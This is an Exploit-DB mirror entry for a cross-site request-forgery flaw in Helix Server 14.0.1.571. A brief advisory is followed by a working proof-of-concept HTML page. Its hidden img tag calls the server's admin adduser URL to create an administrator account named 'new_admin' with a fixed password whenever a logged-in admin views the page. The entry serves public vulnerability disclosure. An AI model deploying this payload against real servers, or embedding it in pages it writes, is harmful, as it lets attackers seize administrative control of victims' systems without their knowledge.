exploit-db-mirror/exploits/multiple/remote/35092.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

13 lines
No EOL
517 B
HTML

source: https://www.securityfocus.com/bid/45340/info
Helix Server is prone to a cross-site request-forgery vulnerability.
An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site.
Helix Server 14.0.1.571 is vulnerable; other versions may also be affected.
<html>
<body>
<img src="http://www.example.com/admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=Password1&realm=TESTBOX.AdminRealm" />
</body>
</html>